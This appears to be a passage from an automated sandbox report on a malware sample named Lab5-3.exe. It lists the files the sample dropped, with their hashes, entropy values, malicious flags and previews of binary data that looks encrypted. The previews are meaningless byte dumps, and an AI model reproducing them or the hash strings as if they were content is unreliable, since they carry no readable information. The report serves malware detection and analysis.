                                                                                                          SHA1:6393A05A0162C14E235301075EAB429AC6BE5046
                                                                                                          SHA-256:81EBC1770A9B434B6DA798C3F0ECE76AC1EE23CD9DB9C378F4EDE8B752A5B4FF
                                                                                                          SHA-512:74A4EAACD9E2FAEEB866C3126BD6EA5FF8011CBA42AA4B72DBC5C5ABF5A7802E99480F71FCD40A5D14EA4CBAFCCB7B5E9AE019D95D0B1F75AD6E9DB959DE82E3
                                                                                                          Malicious:true
                                                                                                          Preview:l.k.I...we%tPf....d..f..9d..YG..%!..~..)..F .fk.1.t..J.>.......O..%..!....4..7...u.....u....."..7......*V...i.<.k...}.]....;W...b!.b..1.VMG.<j?..Q.......=.~;\.>.JA.t}.T.eK.>H.$Z..69..R...#O@qK..]c..e.U.{_.q...i...........Qt.}[_"....jv*.#..*.G}z{..j:XV.V...z.I.Z..\..iR.Y-C<\.v....q..CipG....b*".f....K!.=...x.T.....uJ....vY3.....#.8.Q..b.Y.....w.D..4....PZ...{e+..u.>....H9nxD....kt+YPj"c+.q.....W.=.On.6a.N..;.;".....$..1P..8.@.i2..........i.s......b..h......T.. ....E.7tV.....,k.a.m../..R;.N3...Z..z>bI...D..R..s.......rSGWX.l`y$.....8..ZN4.~.W.../....>...z.h...?,V..u|aE...._@..W...J.F..?..K...w..2...hA...A5../.../l .*.......W|S_..[H..t..,."`.8R.o.".....}..W..y....0........7....}m..-*.X.eVb$b....3.Pw...$....i.k..5.}....`|[H.%.........4'.......c...R........b@../.b..g.9~.o..............aG..*........12.E.(.|.[..Q...@e88...0V..F.>.~..W&.y.~..]...$bz...u..w:.r.....J..5....c9._+.1.}Q{.p^.R9...sg.K......:z."Q..<..n,.1..?,.....[8...'Z..iNm.f....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.99535770159441
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:n+oIx8OJrtwAkKIV9Z8VWzT+FIcBEE9iURguWDGilAxdZ:VOJBw/9VZcRi5DgxdZ
                                                                                                          MD5:1F2BB11DF85405ED029C29985D26BCA1
                                                                                                          SHA1:1FDEA051A843696677778BA4AC04D8B669D61E1B
                                                                                                          SHA-256:CD8C76ECEF9E402F7A9CAD940840E46A2D3AAD9C741CDED14E2B5B5D55799BEB
                                                                                                          SHA-512:6811D87FD3898E1F5A3AF543F63EA1ED9DBA2E64453F91EC31BEC9AD89C92B0BC16A2A08E2DDE75708145FF5082EF2E60EDAE5D36EA4AAEC159B679B13275B36
                                                                                                          Malicious:true
                                                                                                          Preview:...E...9y...Z..?.R..E.U}[._.]h.k%.CJ. ..P..H.T.....p6.L.?!e.u.?..'ry'r....Q..t.'.)8.o....2F#............D...z...%...A.1....n..$.N....,`....5.x.1;E.c0...z........ U.~.....HN..tO.1...........g..:V,<&)...`..M..k...5.9T\O..#..r..f...}.|..I.v..x.r..."/?....hs..F(.]d...VT.YE.j.Q..s.?T&`. .*..9.'K.$..$.5}.....1...v....Y0a.....b....*..nP.S'......:L8..ub ..M...Y....Y......Fv\o|.......$.........ZL.*kgs...7.$..5.B.j..<...g...d.@. .2...5\.Gw.F.9............,Q..a.E$....P..%..S...PR!..6@....a.#..e.;u.!..>>..a..........M.].g.6.Y!...........3.....K.&.=../..Q.B;.W.{>...Yv.`k~....2...~.A.v... `.&..l.2.}.`.5..8.3..i..t..z<l....A....w.~...w...._..K.-2..+*..y..csit.6..G.C.A..).......vt.c."7.[.{.\.$.&.H;..[A@.G....\.,?.h*.C...*`...8..mL_..5....s........(..M..-.......|....L."...vJcs.......{..?.......8c........S......U.......Ie.*\...aD..Z..H.........g(.\. .#)...uK^2C..&.:...F.=.....7...u'...Ab......8....._...^...'NN.|K:...v..J3... .J.tG.....T...$
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.907627546260128
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2AWMLt66G9MOzHfUTid3hBaUoSGFcmeykEdEElU92i:2AvFGx0uKeY2ElUJ
                                                                                                          MD5:EB99AC1081DA63EC4F3B6F0941E4D7DD
                                                                                                          SHA1:08B99CC20629B04B0E6837570C2051930C59827C
                                                                                                          SHA-256:212BA4189E08142A1651A613F2B391CEDCCD98EEFA62360B29660B3832977021
                                                                                                          SHA-512:164EE434ED037683FBEED3170D2F4AD4C3E4597A96B34843B3F9E488D56699B1B46AEB2DA94526B6FF11F34C594C0FAFCBA38B7A155098FCA2DF10D32B18C271
                                                                                                          Malicious:false
                                                                                                          Preview:b2.M.)...,....W...f.)...c.l.S. ,..b8.U.<.w...8R....^@P.T.7.>Z...u%...m.........>V...7$q..r.d:..../....M. .D.......@i.$.%...U.9.t.D..T.J...{.mm...,..s....P..=.....Z.#....LdL..I.A.P..!!j`=m.]x.<o-...i.A)..".$....z.2..+....X^K..}..J..X..'..#.6....,6&4.....-.?i...O.c..).22....9....O..Qd2.h...H...P..s.U.J/.l.....xP......7.].0.K..>Y.Er...N.;(......@.....x:]....pjv....|.e...x+W=).,....7..k.}..&..p.d..y?<+._..|.Cv.;k.+...4.....gQ.2..8.....<5...QBel.P.......-;.I..z..l.iUB^.s.<&...Y[..w.D{~.......~....`.]^.q.Q..#.q.....@edkXO.....7....G.....3?........dh.J.....H..Y.....Y........v......].A.@.Z..I...h....Z..Xd&_].{9.'..$0..f.....Dh56c.+.M...wb... ..........[3........Z...r.-.e....UIU..{........|......d..&..WP....^.....'.X....p..f..'y..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.909272137542986
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TBHNEzQy/aPuOHfUTid3hBaUoSGFcmeykEdEElU92i:dHNcvJhGx0uKeY2ElUJ
                                                                                                          MD5:4BFB5F51C7D0E00C5CA3A1D5F4C0301F
                                                                                                          SHA1:F08C4970637C973D44D7D17CFCEE02D63985D610
                                                                                                          SHA-256:052A8CC89F7C3CC3BA9AE49B5A08DA2591373BB7D9E7F05A40419CB50CE8F053
                                                                                                          SHA-512:93A8BADB37CC2C8744C6AE947BC4EF64B6B3914A70D3852116BFC8057EBA8655FD48A40911F7D5DC972803C871B185D0992F84FE245412CEBA23D299A7D98967
                                                                                                          Malicious:false
                                                                                                          Preview:Y..~....0_.r.....6'@..6..)....%.3.d..08..+TN.............W.....\._...~2..2.Q..)E-.L_..m.....G........<..1....|..!......`..vX..W......S.t^+.r...>......=.....-;0...(j.....'.e\...h..g.....C..3n|....Qh.Q....lr.:w.3..d`X..wlL....^4..R.WI4v.}.X...|.....q.0..V...c...Ny..H-<s..-E6cM.........'.j..v.?5.r,5.9_..........wWe.:.&Rt........+..>A.PI.a..;D.=U..;..M...%.z.{a..Y 8..A.b.b.e.p.......;+c.z..'......w`..u.E.;9..z.g....&.....*.+4G....d..d.;.5z;.?......b.a..VRIjV..z,b&..?Q ..x.nQ[3X.fX..G/f....8d.N.....iO.?.$.v.a*.M....h..Wr........O.#..[..BS.....bQV.....Q87..l8.>KR.yz..{...,f..Y.`..f..l.~3.K..'.z..=U.P.^.I..<...I.........023.O......w..3.`..9...m!.k5.N...U.......Nd.k.....@....~x~e.*2b....X..[....@...o0......QU...v.u.>..@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.905982965311198
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wC9HO6ikHd+HfUTid3hBaUoSGFcmeykEdEElU92i:wIHO67HdRGx0uKeY2ElUJ
                                                                                                          MD5:878826888FE16DF4E9DD2074EABAD1BD
                                                                                                          SHA1:10EC42DE295F7948022273DF0213182D3D63F1BB
                                                                                                          SHA-256:B9CDF356EDDBD92D6313D6FBA067EA655796B1F34A1C855E7294C109D587581F
                                                                                                          SHA-512:FFC291101B969C598DF3198BC229A15AE1AB764E385DB484EC207B8E62815ED155D9E2FD348FC6E3EC7222F1214866D497361B9D599E4D28F8C59F63A362131B
                                                                                                          Malicious:false
                                                                                                          Preview:........G.v8.. .q$........# e.!.n...&.E+.(Yx....Q......w}..*..S.F...#.p..\B3$..;...%.......<..F..}.V..h...y......p.....X.'R.P..W...s...T0vU.\.H...........!...s.....0i.....w.....+..$.z..x.f.,[d....}...[.\f(...9...Q....q$.O7^..%ek..............ei..H\...R1.;L...a.. ..o..L6.<......s1a.B.W.A.<...1..=W.u......n....`..''[. .~*....J3.....O.h.aM...Oo."a.E_.\.......Kd.../..>.7..|.<K.B..o..w....*!.\,Tq...l5{..[g..2.zs\jfw|.y....O^..w.=.H..6..v.*$v.......ku3...R....(.0..#...#.S&....vF\.=.8..A.x...>d...K.u...'-b.../..r...AvY.YWp..{....E.^X.q...(.U..f..Z\.b........!.....^.s..p..].eim.... ..^(.....M..5d.A..|....5x`...$Y.}.2..{.Ve*.Y..Z.n..|l....Z..~...K...O......%JS^.|#.C!)....y..L.....x.2.p...y..R.P<h.l.s..".d.H..sC...z.....97h.H'..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.919347519505098
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:m/HIj8j/ObsZxKFDHpnrAkpWHfUTid3hBaUoSGFcmeykEdEElU92i:mSuxKFrhrTPGx0uKeY2ElUJ
                                                                                                          MD5:285ED242CE855BDA9F93D3D0EAA0E664
                                                                                                          SHA1:C3B19FC2BEC4D17B4F40CA3186AD0C031F5EE990
                                                                                                          SHA-256:7976E7F5B300DDD72D4CBE14BDA8EAB36566B861817DB9C43A84EA0C8874C8CC
                                                                                                          SHA-512:5AC42135F0945CD551ACC8BE30E8C5585B7DAD880783807C14CE1BC162D14691327320A97E4D71C8DDF8E50918EE4202C033695471EEA13E0D8C49D83E5A673A
                                                                                                          Malicious:false
                                                                                                          Preview:..g]Mz.....#..s.C.A....T.\.3!....W.:d....'.h.g...hk.Be.....*...l..h.O$=.2...P=...TeP...W.\.$69..Yh..e;<.........xk...Uh...>C|_.o..|.*.1.,&.....H...t,.K]]...#...2....@=..9Q..'~....B.~.....a.......5.....\.q.Z..p2."..R.....V.A..\S6.......>s..?..d.C....ln.......kB.b.\GSjU:$...%A..M.e7......i.0H..}.tV3...DBUd..\.E1..&...5..s...m2.....!Zv....h...>..T..F.........%Eh:.{\..."T....W..!h.....d.;.Zk....Dz.]..RmuK=.3....._..........Z.+s..Y.IXVO5.O....*i..-....(.\@.@4.......b.*9...b..o?..c.j.U.=.|..~[...n...I..Zx/r.U..y..p....1...8.eCi.~."....;....T.*...a"}..K.%.-Q:..*..j...N_dV.N.......!.dbI.......%.`U..x.......-t...cE}8.....|.u7h.....#.8.7....v[.Ve8:&....q....Wv`..{B...Y.j.q^.\..y.,.VK....Q..}[...%......=.,.....zWfU.?@?...r..I....Gp...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.906856810614809
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:INHr9UYRwF24j9wCYD0pVHfUTid3hBaUoSGFcmeykEdEElU92i:2L9RU2K9LuGx0uKeY2ElUJ
                                                                                                          MD5:8CFECEAA59E12BEDDED38AB14226BB9F
                                                                                                          SHA1:910BD6E3D4BC51CD6A97B4BF7AD2795B9CA664DF
                                                                                                          SHA-256:F76896906460089440D2EB4074F7BA59D14A8CBDCDF2DC01C5CD6018ECD1E270
                                                                                                          SHA-512:9FF70E91F9A40D6AEDC9CB8E038298B1F0E50AEC26A94707231FBE45E1B541D81F51EE8C7B705FB321524C227C8F6E64C24546F35147886E737F4A25E536E7E9
                                                                                                          Malicious:false
                                                                                                          Preview:.,)x.7.<..... ....+...VU.\.....M.o...4HrC..<./..p..;...R...*.s..j...4M_.%.M..5...K.u&.&Z^s...d.....J.+...J..B....\...ZNc.D.m...<..;nZ...M,P.\t.....9.Olch<&...67.AD9.$:.....xRS{.Q.H.(.M7.:L|.9.sQ.T.?n;.[%m............$...E.j .......`1...E@!hn..{.A.O9.'..y;.n,.[..Q"O..L..~]..`..!TN.>....@w.?.7.j...t......1.WL..:....k......^.|...V....>.C.S.2..z...<|.w..l]...H.....~...../?.o..J....U,.WZ.aj7.%o}......+.z..=~.==X...9D...W..B.....kq.......V...+@...pv...G.C.42$2.....:..m..X.j6....3..i..BI{...p..Q......N...B;....#cI..b....O.e.n..5f.8T#g=...!...i..l....\0..m8.z..zr.T...........7~m....M?%.g.%!].".....xGr.=.w..*.......#..j#...K.Z<.x..9X...}.94.6..[.1. .f.f.`}|r...~W@-@...'..x.)$....w]..<'.f..=..qY...mR.'u.lr'b"9....~"......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.913510320206563
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ARoX/Z/pYA2NKZp835MeVHfUTid3hBaUoSGFcmeykEdEElU92i:AKXB/R2wZp+MvGx0uKeY2ElUJ
                                                                                                          MD5:EE3D079E9488F9747C99F269E01ABCA5
                                                                                                          SHA1:2471FEA160A94F8D71FA4719B333540ADEFED1D1
                                                                                                          SHA-256:067DE0B79B45FD0D95F3A139D7DB93345390DF94E8702F5D4ABCE78E1F54CD91
                                                                                                          SHA-512:1161A659A1D7E619E55A06069986EFC6A31282AEBF3D002BEFAF10C2B00BD9B48D135161C26232F39B106270A1FEC1693172E3D367C58B31B7AB91284B0ADC88
                                                                                                          Malicious:false
                                                                                                          Preview:3.=L...&DBJ.yZB.....!hQ..S.g.Ug._...yW]....D ...Xzz|E..@......'....IJ[.hc..&Pu-...A .~!.....m.../.P.9eN..X.~xX..V %.>ok.A....wE.I..$.|.....7..5l..;.~.o..x...~..8.<.......R^.....7.J...m..[.... K..Wg.).GC.........\{+......8.xn...|......Ue.:....[./Ji........P.....l.?.e?kx.t2-..#Tgu4....n....} .7."I_T.n.$>.pM..A.\mT.".`-B..... I.q$4/.P .%$K@.......E....6f.............6....3..\._.^%..R....2.9Iu.....8.jZi..0.(..i.... OS..%......U.!...*.....f..........M.......L.I.7ZB.1.t[...-.....1.....2.z...!|.xPts.d..^9~{FN.~.....46r..-.B4..!t.v.8.k..R+.q.....F....i..K~.^N...nb#..3.}.........5....R).@N..)..^.b.+.&5./l.P.e.A.k.3..W. [UH.$^...>8.....R;.n. ...:.9xt.%.._....[....ng.....Gr..LHq..m....D.5......AQ..dI..T.F.....4...}`.....i~Z.6.+N..$..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.905689852369061
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KK7nQ3mP7MXAEYDwsHfUTid3hBaUoSGFcmeykEdEElU92i:1nQ3UQrTrGx0uKeY2ElUJ
                                                                                                          MD5:47E132E62D250AD6907544A122B308CF
                                                                                                          SHA1:C0A81E6CE936BAE106A80ADA5A1E801027E23A79
                                                                                                          SHA-256:83247FD42CDCC090A16996632298CD1D7E226D9A4A221864F35F54BF88343C46
                                                                                                          SHA-512:BA16896C772FC60C67B61A140286F6D5E9E702899EC9110329003AFB255B8AB953B6FE524A2DC64C58A0D2BD6CE4238A4A54E27115B289F51C3D7D0BEEBDD67A
                                                                                                          Malicious:false
                                                                                                          Preview:......B....g.I..G.8...d:......X_.\-.z.sb..$..W..:1..K..C.?... .#. .9...}.d0.....P...&..S.v...E.hET=A.1..z7X..Dt..+..la`.~.$(v.x3)...)S....tu@A.yb,k.>}U...0....:..L.Hj..l.x.Vb....T...U.7!..t.a"...B.....O.nG.8.>c....y.1*.Q.Z=.v...q...A..Q.Q.8............W.}.P.....?.A.../.[i.4-{p..P..~......O2..'C.P..A.6.9....|./ ...b....7............/.k.:..\Atq..6(W..?;.1...}...v.t.:.U.....s.-...C,...&...:.....8:`......t.....c.Lw>..on.n.S.&.U....9)D....c(n..}-.............)..@.X..t....7...O..ZV.....MDO..sp.o...Q..7..g..#.....^.!....g..e....(.]..!.....E.L...C.....G.I......m.d..<8H.....c.<r...eI....lv....9I..hA...;.o..z..\-t%+..l9...g.....|........U..N.....i..p+.jM.....-7..h....~f.L.j.Hq`fZ.}......~O.._.3y..L.."^.4[.{.J"g.`..,.~!.a...{...s....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.914732775530178
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FEE94T3C1ZWHFPHfUTid3hBaUoSGFcmeykEdEElU92i:i/C10HFUGx0uKeY2ElUJ
                                                                                                          MD5:C4A15E083F443BCF2A8723BD85BF6751
                                                                                                          SHA1:40AC6BECFA1ADF6F27B853879F569592D10588AE
                                                                                                          SHA-256:56E77F3FD5ED42D99B41D57D271BAEF8BED289763EEA973DE87BE479C06C5D0C
                                                                                                          SHA-512:76E930EE0A013862820A569B42D82EB66A3C4372D5356DD3F156AF969AF82156256A02D747875FEFCC84473ABAAFA095CCA42E0A5CC99B64BE74D34DB9677328
                                                                                                          Malicious:false
                                                                                                          Preview:....w.`._.Q]......ag..SI......A...a..B ..t....u^..x..u....D^..N..^_...XG./..V..5...*....'|..x.K..6....J@..N).{+...`..7|...SE.)t../...'iR.X.PV..).>....r.K.|...l...?Q7..%##..B.YC.2[6...@m..ir.Pdm7....{sX..%....+\;....a.E.Z.o..qZ........eBG.....6.X>.D..j.j.v%eM$.dn.r..5.0}.b.e.4.b}.....EG...(q...............".l..B6.k........h....A...%....;:..h(.5.V$p.^..E.$#s..`mh.....-.u....r..;..*. nD..Ct.../.I.:.7vX.wI.(T.9....U...G....].O. Dt1. TPif.v..d....}.3...-W...|..P.$`.<...s.A..Y........h(j...6`.A..X,...D.W..;..1c}..4S,.k.....,..Y.r.].&D.R...g.k.dN7..........f..P...M...s.....tR..#.na<...a.b...T.(.H..P....%7:.Wz3..B]a..q... A.....(l.V...ki6.....R.}./c..#=I.7....fJ....8-.. ......z.Y.q..,.Hz.....08@}k....F...E..h...f....}K..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.914523641865455
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PoGnkM8rOH2O9zdF4AHfUTid3hBaUoSGFcmeykEdEElU92i:lk3s2O8Gx0uKeY2ElUJ
                                                                                                          MD5:E7C0CD51E2BE9EA51A283EF57AA6AB6A
                                                                                                          SHA1:8AB0801D22D88CB22535C72119B38700FEE8EE39
                                                                                                          SHA-256:D17A62A02E4EA7DDF4C6FD62906F7AFCFA5A184BC947C4C0A8FFB2F34139202A
                                                                                                          SHA-512:C9CAEF5BB959190EF1C20BD7A3E004BE04B82B130330CF52DA1746DACBCE4872FCF15B3BAF1559B4709FADFD39CE2D6B493C7A63BF0CB124D4CD95A5B1CC7394
                                                                                                          Malicious:false
                                                                                                          Preview:D8.m..~&T..=|4......{..Q.2......%...41.H.".r.....y.*..1.!........%..R&.Dlnw........m...r,..o...'9.._.A.M..:0.gIM..4..U....W.C8......BLo.........V.}'.K.Y...F......2..=..4.d........c......A$......cB.....D..F.y$Z.....E....2..g6.....@V.X..ca.C~.$.D..{.Lt..s.3...h..."H=_.5.<.......6..6.,..G@tK...$.I.L...>.h.:.7VmB...L...y.Z@......&;FW....$....w....[9.i2....7h.T+.I...c...1q6R...k.(?%3...BX.(s}O@.....2....{.......]...Ixx...mUJ..x.r.......2.Q...m..F.jU..=ul....".Z..)B/yE.u..y...,^..6Lsl6n.............nY.N........H.&.WX..}.^. ..s.?~........xb~{...`..{.u/..k......8...t9.'|..1a....osy....&...M..gp+_..-......Bl.....~B|..D.ZGd7.Cs,.xX.#......sB..MD.t...z.U..k>~O....W..n.....6............. ...9=..|.-...a..[.=b{...3<.K..|...j.,."..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.911853121433782
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JKOhp94wHfUTid3hBaUoSGFcmeykEdEElU92i:YOp943Gx0uKeY2ElUJ
                                                                                                          MD5:D5A945ED8C14A00D34DB2D0829C4B36E
                                                                                                          SHA1:43BCC028ED36A8686B9873B3A137FCEF7C49E46E
                                                                                                          SHA-256:DEC7A3525D3EA009AAC6F1500716B6CAA220233B0987605AE1F6C5EC7070A36C
                                                                                                          SHA-512:96DDC209055AC9D0E18DF18F92473BF38149473689D18A2D40C885F696C9036AA3B2CFDCE4C979BB374DDECDED791CB7E81AB0076E9EFD256A1C0F09746680AB
                                                                                                          Malicious:false
                                                                                                          Preview:..=sQ.%..lcmH...+.Sj2..9.r.c\..c....`......%.|.]........t.\#..O......53AZ..80.TDu.Z.k......X+FL.c.eH..w|h..R1.=.I+.~B........?....v.].I7;....`y..y6.P.g.p..j...U.>b).:..!...Cc?..A.[K..l..cm.=W3....m..D..Y.j.@.R.~q"..".#.Xx..-KL.<.=...Iy...v..s.;1.........`.(v.>t....pE.V%.K......:.;.AGy...9z......k._.M.....;V8......,.......#S....~.2M.7......^..|......i..y....M...G....;E..&.8.:x.d.*E.J'........'1,.OXlK+...o.?.T.B..33+......2...q...y..p.4 ..6...p..M(.....Ik..'UOO)/._...`.F...%qo@...\TZ....}+,<2.ARN.....[.z.!~0.T....>..s.=.8..i..N.......nd..@..]y..$.\&#c"...R.<.?.#..@..OmfFKF......(.s#t8$...3..Y.C.."..0.c.U.5..vA\.!....m@7.t.0....7v..ur.k....>....`9.[..=..?.. .J.$j....8.i..z.4....M.6...2h.V-..t.........U..Z(.v*..-...>w.[O....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.905050404010661
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:taZaWSNsSSHfUTid3hBaUoSGFcmeykEdEElU92i:taZaWSGoGx0uKeY2ElUJ
                                                                                                          MD5:A37CB1D62DE8C6AB6D6D6E460529960A
                                                                                                          SHA1:B4DB23133C97B2283281110A616ECF2FE4DBFCAA
                                                                                                          SHA-256:8A2FF200B463F30A820113F1C916FE6FC55CD106BA8F482B268682EC5A5372D2
                                                                                                          SHA-512:7FFEBF3F8569178455AC3A1B8AE106F45FAE8DE29EF9AE3FD80D25483B60E739EC8EF431D4B600C1AE0C643F9EB47801683C79183633D659C577FC7DE8FBAB73
                                                                                                          Malicious:false
                                                                                                          Preview:.3./..Vz..%.$....8.....!p...L.N..{...........A_..14^.5...}.6.I..)..sX.-xUY...[_..&....{=.Z......H...*..b.".Q...u.I...C.......OS.8....z:&..]dY.Hf5...5..Wo.)q.RD....^V.W<k$F..t...S.....l.....w-./.d..A.G.q.Q\.....[D...,Z..no..i.C.f.......A.s.`.......!.]92Ky..,.$(..........bI..Y?.y%.bCz?....5.fg.&?....2.x.........]6v..i.c.......w.....A....A.Z..2....R....Zk..M+...Z.i.2=..Y...,.B.........I....g..N.)......4...3L.\.g.5G....N.d.DJzb0..Y......O....q.....O..5...j'[;.....b...f.0L.7M%....Z}d..;..n@......J......n.......fZ..L.....]....|sN.1.Y1w.}.X...EEr.k....+.V..L.+F%$w....O|t..w../...1}.I|...vf...^BU.xjb%w.\.+.......w........6.D'~W.s.uB5..8..k...:.N]J..q.=.[..`..6.......3.C...{.#.(z.B.&x.#........{.o80..b.S.$.{.F*.Cj\....g....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.916201161163728
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:b9J5vWE8zhhHfUTid3hBaUoSGFcmeykEdEElU92i:b5DGx0uKeY2ElUJ
                                                                                                          MD5:EB4C8CF3B91DA675F1A188E3229A64DF
                                                                                                          SHA1:6083A0C47E1B59253CD681865DD3CB6ECCED82FE
                                                                                                          SHA-256:D237599F802D5506B1CCB938CA37D683257A7C2EA1C4E2E2C2FAAA14E2FB6A04
                                                                                                          SHA-512:DB9E44C4AF74D0850A7AC4E334F7A4F1206C548DA4282CB65A1DE1323820E5B22013A82821B01FECF8E1449E4CDCE5F819989F7CD16869872088DB7B04FA44C4
                                                                                                          Malicious:false
                                                                                                          Preview:...-r"..S.g...L\..@..X...(....]..O..z..1.;.Z.....7AJ..B...@........m.<........8\.Q.GO"@2.?...-..o............A.M..W.g..Q6._I...oU..3?..Q.$r..u....T....S..%G....fx#..~/....4.3Na.0.f.....G}hZ..7y.v...x]s{.R.Z'.o.W `_.~..u..se7..Wt-.....>,..x..*...........5+.%.....ef.W..B......s.4.p.F....\H:.v...%..cn..).[X.......!...*...k.....4.=....d.O"..H-.*z....$.5..yl7..}..G.=..Y..G...b.t....?..{"(.Y..)....p!a...&?KA..fF.9....3.n...........w..8&{A.... ....kP..u.)...u.9.I..t...y..>.|<B.5.SIY...qL.Zs..<........r(%..);.....E.N..6...@D7|...$...?..1.t...Z7..K.....;c.........v$M.6<.......9(P...).O....]3.......-*X....k.ik..0gL_?.-.}5d.:.D...~.}4..m/.Q..|&lq...9h..>.....{...h. .....f....? .h..J..M.!.:.Q;2<......*.9.%...4.....y`........A...:h.C......0....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.906903610700388
